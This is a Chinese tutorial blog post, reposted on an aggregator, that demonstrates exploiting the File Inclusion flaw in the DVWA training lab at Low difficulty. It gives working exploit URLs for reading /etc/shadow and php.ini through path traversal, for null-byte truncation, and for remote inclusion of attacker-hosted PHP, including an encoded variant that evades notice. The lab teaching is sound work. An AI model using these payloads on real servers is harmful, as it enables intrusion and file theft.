码迷,mamicode.com
首页 > 其他好文 > 详细

DVWA-4.1 File Inclusion(文件包含)-Low

时间:2020-05-06 16:42:09      阅读:73      评论:0      收藏:0      [点我收藏+]

标签:动态   class   核心   com   Once   abi   服务   文件读取   wamp   

File Inclusion 

File Inclusion,意思是文件包含(漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。文件包含漏洞分为本地文件包含漏洞远程文件包含漏洞,远程文件包含漏洞是因为开启了php配置中的allow_url_fopen选项(选项开启之后,服务器允许包含一个远程的文件)。

Low Level

服务器端核心代码

<?php

// The page we wish to display
$file = $_GET[ ‘page‘ ];

?>

可以看到,服务器端对page参数没有做任何的过滤跟检查。

服务器期望用户的操作是点击下面的三个链接,服务器会包含相应的文件,并将结果返回。需要特别说明的是,服务器包含文件时,不管文件后缀是否是php,都会尝试当做php文件执行,如果文件内容确为php,则会正常执行并返回结果,如果不是,则会原封不动地打印文件内容,所以文件包含漏洞常常会导致任意文件读取与任意命令执行。

技术图片

点击file1.php后,显示如下

技术图片

而现实中,恶意的攻击者是不会乖乖点击这些链接的,因此page参数是不可控的。

漏洞利用

1、本地文件包含

构造url

http://127.0.0.1/dvwa/vulnerabilities/fi/?page=/etc/shadow

报错,显示没有这个文件,说明不是服务器系统不是Linux,但同时暴露了服务器文件的绝对路径D:\software\wamp\www\

技术图片

构造url(绝对路径)

http://127.0.0.1/dvwa/vulnerabilities/fi/?page=D:\software\wamp\www\dvwa\php.ini

成功读取了服务器的php.ini文件

技术图片

构造url(相对路径)

http://127.0.0.1/dvwa/vulnerabilities/fi/?page=..\..\..\..\..\..\..\..\..\software\wamp\www\dvwa\php.ini

加这么多..\是为了保证到达服务器的D盘根目录,可以看到读取是成功的。

技术图片

同时我们看到,配置文件中的Magic_quote_gpc选项为off。在php版本小于5.3.4的服务器中,当Magic_quote_gpc选项为off时,我们可以在文件名中使用%00进行截断,也就是说文件名中%00后的内容不会被识别,即下面两个url是完全等效的。

A)http://127.0.0.1/dvwa/vulnerabilities/fi/?page=..\..\..\..\..\..\..\..\..\software\wamp\www\dvwa\php.ini
B)http://127.0.0.1/dvwa/vulnerabilities/fi/?page=..\..\..\..\..\..\..\..\..\software\wamp\www\dvwa\php.ini%0012.php

可惜的是由于本次实验环境的php版本为5.5.12,所以无法进行验证。

技术图片

使用%00截断可以绕过某些过滤规则,例如要求page参数的后缀必须为php,这时链接A会读取失败,而链接B可以绕过规则成功读取。

2、远程文件包含

当服务器的php配置中,选项allow_url_fopenallow_url_include为开启状态时,服务器会允许包含远程服务器上的文件,如果对文件来源没有检查的话,就容易导致任意远程代码执行。

在远程服务器 172.16.135.47 上传一个phpinfo.txt文件,内容如下

<?php
phpinfo();
?>

技术图片

构造url

http://172.16.134.26/dvwa/vulnerabilities/fi/?page=http://172.16.135.47/dvwa/phpinfo.txt

成功在服务器上执行了phpinfo函数

技术图片

为了增加隐蔽性,可以对 http://172.16.135.47/dvwa/phpinfo.txt 进行编码

http://172.16.134.26/dvwa/vulnerabilities/fi/?page=%68%74%74%70%3a%2f%2f%31%37%32%2e%31%36%2e%31%33%35%2e%34%37%2f%64%76%77%61%2f%70%68%70%69%6e%66%6f%2e%74%78%74

同样可以执行成功

技术图片

 

参考:https://www.freebuf.com/articles/web/119150.html

DVWA-4.1 File Inclusion(文件包含)-Low

标签:动态   class   核心   com   Once   abi   服务   文件读取   wamp   

原文地址:https://www.cnblogs.com/zhengna/p/12741084.html
(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
分享档案
更多>
2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)
周排行
mamicode.com排行更多图片
更多
友情链接
兰亭集智   国之画   百度统计   站长统计   阿里云   chrome插件   新版天听网
关于我们 - 联系我们 - 留言反馈
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!